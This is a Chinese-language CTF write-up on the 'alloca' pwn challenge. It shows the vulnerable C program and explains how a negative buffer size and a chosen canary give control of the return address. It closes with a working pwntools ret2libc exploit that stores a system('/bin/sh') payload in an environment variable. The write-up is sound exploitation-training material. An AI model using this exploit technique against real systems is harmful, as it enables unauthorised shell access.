0x00:
好久没玩了...去年十月以后就没玩过了TAT 这几天把peach的坑,winafl的坑填了下,就来搞下pwn。
0x01:
这个程序是给了源码的
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void clear_newlines(){
int c;
do{
c = getchar();
}while (c != '
' && c != EOF);
}
int g_canary;
int check_canary(int canary){
int result = canary ^ g_canary;
int canary_after = canary;
int canary_before = g_canary;
printf("canary before using buffer : %d
", canary_before);
printf("canary after using buffer : %d
", canary_after);
if(result != 0){
printf("what the f...??? how did you fucked this buffer????
");
}
else{
printf("I told you so. its trivially easy to prevent BOF :)
");
printf("therefore as you can see, it is easy to make secure software
");
}
return result;
}
int size;
char* buffer;
int main(){
printf("- BOF(buffer overflow) is very easy to prevent. here is how to.
");
sleep(2);
printf(" 1. allocate the buffer size only as you need it
");
printf(" 2. know your buffer size and limit the input length
");
printf("- simple right?. let me show you.
");
sleep(2);
printf("- whats the maximum length of your buffer?(byte) : ");
scanf("%d", &size);
clear_newlines();
printf("- give me your random canary number to prove there is no BOF : ");
scanf("%d", &g_canary);
clear_newlines();
printf("- ok lets allocate a buffer of length %d
", size);
sleep(1);
buffer = alloca( size + 4 ); // 4 is for canary
printf("- now, lets put canary at the end of the buffer and get your data
");
printf("- don't worry! fgets() securely limits your input after %d bytes :)
", size);
printf("- if canary is not changed, we can prove there is no BOF :)
");
printf("$ ");
memcpy(buffer+size, &g_canary, 4); // canary will detect overflow.
fgets(buffer, size, stdin); // there is no way you can exploit this.
printf("
");
printf("- now lets check canary to see if there was overflow
");
check_canary( *((int*)(buffer+size)) );
return 0;
}
主要还是需要突破他的防护,拿到shell。
看下bin文件开了什么保护:
调试发现,check_canary()函数返回的时候,如果恰当的设置g_canary的值,就可以控制返回地值。
然后我就卡在这里了...开启了NX,只能ROP的思路搞,但是ROP链又不知道哪里放置。
0x02:
后来参考了别人的做法,才发现这是个本地利用...直接按照以前玩overthewire学来的套路就可以:sc放在环境变量离,然后确定地址,直接改返回地值过去就可以了。
不过首先要利用ulimit -s unlimited去固定下libc的加载地址,然后才可以确定system()和/bin/sh地址。
附上我本地调试的时候的exp,环境不同,所以地址可能不同。
from pwn import *
import os
off_system = 0x0003d3e0 # objdump -d /lib/i386-linux-gnu/libc.so.6 | grep system
off_shell = 0x0015ea69 # grep -oba /bin/sh /lib/i386-linux-gnu/libc.so.6
adr_libc = 0x40047000 # ldd alloca
adr_payload = 0x40025857 # searchmem "AAAA"
payload = p32(adr_libc + off_system)
payload += p32(0xdeadbeef)
payload += p32(adr_libc + off_shell)
#test = "AAAABBBBCCCC"
#p = process('./alloca', env = {'LD_PRELOAD': test})
p = process('./alloca', env = {'LD_PRELOAD': payload})
#raw_input("$$")
p.sendline(str(-92))
p.sendline(str((adr_payload + 4) ^ 0x08048250))
p.interactive()
'''
0x40025857 ^ 0x08048250 --> 0x4806da07
Cannot access memory at address 0x4806da03
0x40025857 + 4
'''